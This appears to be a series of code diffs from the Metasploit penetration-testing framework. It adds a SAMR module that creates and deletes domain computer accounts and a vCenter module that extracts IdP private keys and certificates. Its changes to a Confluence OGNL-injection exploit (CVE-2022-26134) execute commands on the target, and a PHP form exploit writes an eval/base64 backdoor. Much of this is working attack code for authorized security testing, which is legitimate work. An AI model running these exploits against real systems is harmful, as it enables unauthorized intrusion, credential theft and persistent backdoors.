-      status = service_start(name, server)
+    if status == Error::SUCCESS
+      vprint_good("[#{name}] Service started")
+      return true
+    end

-      if status == Error::SUCCESS
-        vprint_good("[#{name}] Service started")
-        return true
-      else
-        raise status
-      end
-    rescue RuntimeError => s
-      if tried
-        vprint_error("[#{name}] Unhandled error: #{s}")
-        return false
-      else
-        tried = true
-      end

-      case s.message.to_i
-      when Error::ACCESS_DENIED
-        vprint_error("[#{name}] Access denied")
-      when Error::INVALID_HANDLE
-        vprint_error("[#{name}] Invalid handle")
-      when Error::PATH_NOT_FOUND
-        vprint_error("[#{name}] Service binary could not be found")
-      when Error::SERVICE_ALREADY_RUNNING
-        vprint_status("[#{name}] Service already running attempting to stop and restart")
-        stopped = service_stop(name, server)
-        if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
-          retry
-        else
-          vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
-        end
-      when Error::SERVICE_DISABLED
-        vprint_status("[#{name}] Service disabled attempting to set to manual")
-        if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
-          retry
-        else
-          vprint_error("[#{name}] Service disabled, unable to change start type")
-        end
+    case status
+    when Error::ACCESS_DENIED
+      vprint_error("[#{name}] Access denied")
+    when Error::INVALID_HANDLE
+      vprint_error("[#{name}] Invalid handle")
+    when Error::PATH_NOT_FOUND
+      vprint_error("[#{name}] Service binary could not be found")
+    when Error::SERVICE_ALREADY_RUNNING
+      vprint_status("[#{name}] Service already running attempting to stop and restart")
+      stopped = service_stop(name, server)
+      if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
+        service_restart(name, start_type, server, false) if should_retry
      else
-        vprint_error("[#{name}] Unhandled error: #{s}")
-        return false
+        vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
      end
+    when Error::SERVICE_DISABLED
+      vprint_status("[#{name}] Service disabled attempting to set to manual")
+      if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
+        service_restart(name, start_type, server, false) if should_retry
+      else
+        vprint_error("[#{name}] Service disabled, unable to change start type")
+      end
+    else
+      status = WindowsError::Win32.find_by_retval(s).first
+      vprint_error("[#{name}] Unhandled error: #{status.name}: #{status.description}")
+      return false
    end
  end

@@ -30,7 +30,8 @@ class Priv < Extension
    named_pipe_2: 2,
    token_dup: 3,
    named_pipe_rpcss: 4,
-    named_pipe_print_spooler: 5
+    named_pipe_print_spooler: 5,
+    named_pipe_efs: 6
  }.freeze

  #
@@ -24,6 +24,7 @@ class Console::CommandDispatcher::Priv::Elevate
  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP        = 3
  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
  ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER  = 5
+  ELEVATE_TECHNIQUE_NAMEDPIPE_EFS           = 6

  ELEVATE_TECHNIQUE_DESCRIPTION =
    [
@@ -32,7 +33,8 @@ class Console::CommandDispatcher::Priv::Elevate
      'Named Pipe Impersonation (Dropper/Admin)',
      'Token Duplication (In Memory/Admin)',
      'Named Pipe Impersonation (RPCSS variant)',
-      'Named Pipe Impersonation (PrintSpooler variant)'
+      'Named Pipe Impersonation (PrintSpooler variant)',
+      'Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)'
    ]

  #
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.93'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
  # Needed by msfgui and other rpc components
@@ -0,0 +1,249 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAMR Computer Management',
+        'Description' => %q{
+          Add, lookup and delete computer accounts via MS-SAMR. By default
+          standard active directory users can add up to 10 new computers to the
+          domain. Administrative privileges however are required to delete the
+          created accounts.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'JaGoTu', # @jagotu Original Impacket code
+          'Spencer McIntyre',
+        ],
+        'References' => [
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
+          [ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],
+          [ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]
+        ],
+        'DefaultAction' => 'ADD_COMPUTER'
+      )
+    )
+
+    register_options([
+      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
+      OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),
+      Opt::RPORT(445)
+    ])
+  end
+
+  def connect_samr
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    samr
+  end
+
+  def run
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    begin
+      @samr = connect_samr
+      @server_handle = @samr.samr_connect
+    rescue RubySMB::Dcerpc::Error::FaultError => e
+      elog(e.message, error: e)
+      fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")
+    end
+
+    if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
+      all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
+      all_domains.delete('Builtin')
+      if all_domains.empty?
+        fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
+      elsif all_domains.length > 1
+        print_status("Enumerated domains: #{all_domains.join(', ')}")
+        fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
+      end
+
+      @domain_name = all_domains.first
+      print_status("Using automatically identified domain: #{@domain_name}")
+    else
+      @domain_name = datastore['SMBDomain']
+    end
+
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+    send("action_#{action.name.downcase}")
+  rescue RubySMB::Dcerpc::Error::DcerpcError => e
+    elog(e.message, error: e)
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue RubySMB::Error::RubySMBError
+    elog(e.message, error: e)
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def action_add_computer
+    if datastore['COMPUTER_NAME'].blank?
+      computer_name = random_hostname
+      4.downto(0) do |attempt|
+        break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
+
+        computer_name = random_hostname
+        fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
+      end
+    else
+      computer_name = datastore['COMPUTER_NAME']
+      if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+        fail_with(Failure::BadConfig, 'The specified computer name already exists.')
+      end
+    end
+
+    result = @samr.samr_create_user2_in_domain(
+      domain_handle: @domain_handle,
+      name: computer_name,
+      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    if datastore['COMPUTER_PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(32)
+    else
+      password = datastore['COMPUTER_PASSWORD']
+    end
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: 1,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
+        },
+        user_password: {
+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            password,
+            @simple.client.application_key
+          )
+        }
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
+    report_creds(@domain_name, computer_name, password)
+  end
+
+  def action_delete_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    fail_with(Failure::BadConfig, 'The specified computer was not found.') if details.nil?
+    details = details[computer_name]
+
+    handle = @samr.samr_open_user(domain_handle: @domain_handle, user_id: details[:rid])
+    @samr.samr_delete_user(user_handle: handle)
+    print_good('The specified computer has been deleted.')
+  end
+
+  def action_lookup_computer
+    fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?
+    computer_name = datastore['COMPUTER_NAME']
+
+    details = @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+    if details.nil?
+      print_error('The specified computer was not found.')
+      return
+    end
+    details = details[computer_name]
+    sid = @samr.samr_rid_to_sid(object_handle: @domain_handle, rid: details[:rid]).to_s
+    print_good("Found #{@domain_name}\\#{computer_name} (SID: #{sid})")
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end
@@ -31,13 +31,13 @@ class MetasploitModule < Msf::Auxiliary
        'Targets' => [['WordPress', {}]],
        'DefaultTarget' => 0,
        'References' => [
-          ['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/'],
-          ['NOCVE', 'Patched in 3.53.3 without vendor disclosure']
+          ['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
-          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
+          'NOCVE' => ['Patched in 3.53.3 without vendor disclosure']
        }
      )
    )
@@ -35,7 +35,9 @@ class MetasploitModule < Msf::Auxiliary
        ],
      'Notes'           =>
        {
-          'SideEffects' =>  [CONFIG_CHANGES]
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => [CONFIG_CHANGES]
        },
      'DisclosureDate'  => '2018-11-08'
    ))
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Extract Secrets from vmdir / vmafd DB File',
+        'Description' => %q{
+          Grab certificates from the vCenter server vmdird and vmafd
+          database files and adds them to loot. The vmdird MDB database file
+          can be found on the live appliance under the path
+          /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path
+          /storage/db/vmware-vmafd/afd.db. The vmdir database contains the
+          IdP signing credential, and vmafd contains the vCenter certificate
+          store. This module will accept either file from a live vCenter
+          appliance, or from a vCenter appliance backup archive; either or
+          both files can be supplied.
+        },
+        'Author' => 'npm[at]cesium137.io',
+        'Platform' => [ 'linux' ],
+        'DisclosureDate' => '2022-05-10',
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/']
+        ],
+        'Actions' => [
+          [
+            'Dump',
+            {
+              'Description' => 'Dump secrets from vCenter files'
+            }
+          ]
+        ],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('VMDIR_MDB', [ false, 'Path to the vmdir data.mdb file' ]),
+      OptPath.new('VMAFD_DB', [ false, 'Path to the vmafd afd.db file' ]),
+      OptString.new('VC_IP', [ false, '(Optional) IPv4 address to attach to loot' ])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MDB_CHUNK_SIZE', [ true, 'Block size to use when scanning MDB file', 4096 ]),
+      OptInt.new('MDB_STARTING_OFFSET', [ true, 'Starting offset for MDB file binary scan', 0 ])
+    ])
+  end
+
+  def loot_host
+    datastore['VC_IP'] || '127.0.0.1'
+  end
+
+  def vmdir_file
+    datastore['VMDIR_MDB']
+  end
+
+  def vmafd_file
+    datastore['VMAFD_DB']
+  end
+
+  def run
+    unless vmdir_file || vmafd_file
+      print_error('Please specify the path to at least one vCenter database file (VMDIR_MDB or VMAFD_DB)')
+      return
+    end
+    if vmdir_file
+      print_status("Extracting vmwSTSTenantCredential from #{vmdir_file} ...")
+      extract_idp_cert
+    end
+    if vmafd_file
+      print_status("Extracting vSphere platform certificates from #{vmafd_file} ...")
+      extract_vmafd_certs
+    end
+  end
+
+  def extract_vmafd_certs
+    db = SQLite3::Database.open(vmafd_file)
+    db.results_as_hash = true
+    unless (vecs_entry_alias = db.execute('SELECT DISTINCT Alias FROM CertTable WHERE PrivateKey NOT NULL;'))
+      fail_with(Msf::Exploit::Failure::NoTarget, 'Empty Alias list returned from CertTable')
+    end
+    vecs_entry_alias.each do |vecs_alias|
+      store_label = vecs_alias['Alias'].upcase
+      unless (res = db.execute("SELECT PrivateKey, CertBlob FROM CertTable WHERE Alias = '#{store_label}';").first)
+        fail_with(Msf::Exploit::Failure::NoTarget, "Could not extract CertTable Alias '#{store_label}'")
+      end
+      priv_pem = res['PrivateKey'].encode('utf-8').delete("\000")
+      pub_pem = res['CertBlob'].encode('utf-8').delete("\000")
+      begin
+        key = OpenSSL::PKey::RSA.new(priv_pem)
+        cert = OpenSSL::X509::Certificate.new(pub_pem)
+        p = store_loot(store_label, 'PEM', loot_host, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
+        print_good("#{store_label} key: #{p}")
+        p = store_loot(store_label, 'PEM', loot_host, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
+        print_good("#{store_label} cert: #{p}")
+      rescue OpenSSL::PKey::PKeyError
+        print_error("Could not extract #{store_label} private key")
+      rescue OpenSSL::X509::CertificateError
+        print_error("Could not extract #{store_label} certificate")
+      end
+    end
+  rescue SQLite3::NotADatabaseException => e
+    fail_with(Msf::Exploit::Failure::NoTarget, "Error opening SQLite3 database '#{vmafd_file}': #{e.message}")
+  rescue SQLite3::SQLException => e
+    fail_with(Msf::Exploit::Failure::NoTarget, "Error calling SQLite3: #{e.message}")
+  end
+
+  def extract_idp_cert
+    sts_pem = nil
+    unless (bytes = read_mdb_sts_block(vmdir_file, datastore['MDB_CHUNK_SIZE'], datastore['MDB_STARTING_OFFSET']))
+      fail_with(Msf::Exploit::Failure::NoTarget, "Invalid vmdird database '#{vmdir_file}': unable to locate TenantCredential-1 in binary stream")
+    end
+    idp_key = get_sts_key(bytes)
+    idp_key_pem = idp_key.to_pem.to_s
+    get_sts_pem(bytes).each do |stscert|
+      idp_cert_pem = stscert.to_pem.to_s
+      case stscert.check_private_key(idp_key)
+      when true # Private key associates with public cert
+        sts_pem = "#{idp_key_pem}#{idp_cert_pem}"
+        p = store_loot('idp', 'PEM', loot_host, idp_key_pem, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
+        print_good("SSO_STS_IDP key: #{p}")
+        p = store_loot('idp', 'PEM', loot_host, idp_cert_pem, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
+        print_good("SSO_STS_IDP cert: #{p}")
+      when false # Private key does not associate with this cert (VMCA root)
+        p = store_loot('vmca', 'PEM', loot_host, idp_cert_pem, 'VMCA_ROOT.pem', 'vCenter VMCA root certificate')
+        print_good("VMCA_ROOT cert: #{p}")
+      end
+    end
+    unless sts_pem # We were unable to link a public and private key together
+      fail_with(Msf::Exploit::Failure::NoTarget, 'Unable to associate IdP certificate and private key')
+    end
+  end
+
+  def read_mdb_sts_block(file_name, chunk_size, offset)
+    bytes = nil
+    file = File.open(file_name, 'rb')
+    while offset <= file.size - chunk_size
+      buf = File.binread(file, chunk_size, offset + 1)
+      if buf.match?(/cn=tenantcredential-1/i) && buf.match?(/[\x30\x82](.{2})[\x30\x82]/n) && buf.match?(/[\x30\x82](.{2})[\x02\x01\x00]/n)
+        target_offset = offset + buf.index(/cn=tenantcredential-1/i) + 1
+        bytes = File.binread(file, chunk_size * 2, target_offset)
+        break
+      end
+      offset += chunk_size
+    end
+    bytes
+  rescue StandardError => e
+    fail_with(Msf::Exploit::Failure::Unknown, "Exception in #{__method__}: #{e.message}")
+  ensure
+    file.close
+  end
+
+  def read_der(bytes)
+    der_len = (bytes[2..3].unpack('H*').first.to_i(16) + 4).to_i
+    unless der_len <= bytes.length - 1
+      fail_with(Msf::Exploit::Failure::Unknown, 'Malformed DER: byte length exceeds working buffer size')
+    end
+    bytes[0..der_len - 1]
+  end
+
+  def get_sts_key(bytes)
+    working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}020100/) / 2 # PKCS1 magic bytes
+    byte_len = bytes.length - working_offset
+    key_bytes = read_der(bytes[working_offset, byte_len])
+    key_b64 = Base64.strict_encode64(key_bytes).scan(/.{1,64}/).join("\n")
+    key_pem = "-----BEGIN PRIVATE KEY-----\n#{key_b64}\n-----END PRIVATE KEY-----"
+    vprint_status("key_pem:\n#{key_pem}")
+    OpenSSL::PKey::RSA.new(key_pem)
+  rescue OpenSSL::PKey::PKeyError
+    # fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of PKCS#1 RSA private key')
+    print_error('Failure during extract of PKCS#1 RSA private key')
+  end
+
+  def get_sts_pem(bytes)
+    idp_certs = []
+    working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}3082/) / 2 # x509v3 magic bytes
+    byte_len = bytes.length - working_offset
+    working_bytes = bytes[working_offset, byte_len]
+    [4, 8].each do |offset|
+      der_bytes = read_der(working_bytes)
+      der_b64 = Base64.strict_encode64(der_bytes).scan(/.{1,64}/).join("\n")
+      der_pem = "-----BEGIN CERTIFICATE-----\n#{der_b64}\n-----END CERTIFICATE-----"
+      vprint_status("der_pem:\n#{der_pem}")
+      idp_certs << OpenSSL::X509::Certificate.new(der_pem)
+      next_offset = working_offset + der_bytes.length + offset - 1
+      working_offset = next_offset
+      byte_len = bytes.length - working_offset
+      working_bytes = bytes[working_offset, byte_len]
+    end
+    idp_certs
+  rescue OpenSSL::X509::CertificateError
+    # fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of x509v3 certificate')
+    print_error('Failure during extract of x509v3 certificate')
+  end
+end
@@ -62,10 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote
        'DisclosureDate' => '2022-02-02',
        'DefaultTarget' => 0,
        'Notes' => {
-          'Stability' => CRASH_SERVICE_RESTARTS,
+          'Stability' => [CRASH_SERVICE_RESTARTS],
          # repeatable... but only works 65% of the time, see comments above
-          'Reliability' => REPEATABLE_SESSION,
-          'SideEffects' => nil
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
        }
      )
    )
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
        [
          [ 'CVE', '2014-4880' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
+          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
        ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Spencer McIntyre'
        ],
        'References' => [
-          ['CVE', '2021-26084'],
+          ['CVE', '2022-26134'],
          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
        ],
        'DisclosureDate' => '2022-06-02',
        'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
+        'Platform' => ['unix', 'linux', 'win'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
@@ -54,6 +54,22 @@ class MetasploitModule < Msf::Exploit::Remote
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper
            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
          ]
        ],
        'DefaultTarget' => 0,
@@ -74,22 +90,45 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
-    version = get_confluence_version
-    return CheckCode::Unknown unless version
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version

-    vprint_status("Detected Confluence version: #{version}")
-    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+    vprint_status("Detected Confluence version: #{confluence_version}")

-    return CheckCode::Unknown unless res
-
-    unless res && res.headers.include?(header)
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
      return CheckCode::Safe('Failed to test OGNL injection.')
    end

+    vprint_status("Detected target platform: #{confluence_platform}")
    CheckCode::Vulnerable('Successfully tested OGNL injection.')
  end

+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2022-26134
+    return @confluence_platform if @confluence_platform
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader(
+            "#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.System.getProperty('os.name')")
+            )
+      }
+    OGNL
+    res = inject_ognl(ognl)
+    return nil unless res
+
+    res.headers[header]
+  end
+
  def get_confluence_version
    return @confluence_version if @confluence_version

@@ -107,6 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
+    end
+
+    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
+      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
+    end
+
    print_status("Executing #{payload_instance.refname} (#{target.name})")

    case target['Type']
@@ -119,26 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def execute_command(cmd, _opts = {})
    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
-    res = inject_ognl(cmd, header: header)
-
-    unless res && res.headers.include?(header)
-      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
-    end
-
-    vprint_good("Successfully executed command: #{cmd}")
-    res.headers[header]
-  end
-
-  def inject_ognl(cmd, header:)
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
-      'headers' => { header => cmd }
-    )
-  end
-
-  def ognl_payload(_cmd, header:)
-    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
      ${
        Class.forName("com.opensymphony.webwork.ServletActionContext")
          .getMethod("getResponse",null)
@@ -154,5 +183,20 @@ class MetasploitModule < Msf::Exploit::Remote
            )
      }
    OGNL
+    res = inject_ognl(ognl, 'headers' => { header => cmd })
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def inject_ognl(ognl, opts = {})
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')
+    }.merge(opts))
  end
 end
@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
      ])
    register_advanced_options(
      [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
      ])
  end

@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
+    name_field = datastore['NameField']
+    email_field = datastore['EmailField']
+    message_field = datastore['MessageField']
    payload_file_name = "#{rand_text_alphanumeric(8)}.php"
    payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"

@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote

    data = Rex::MIME::Message.new
    data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")

    print_status("Writing the backdoor to #{payload_file_path}")
    res = send_request_cgi(
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
        'DisclosureDate' => '2021-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
-          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'SideEffects' => [REPEATABLE_SESSION]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
        },
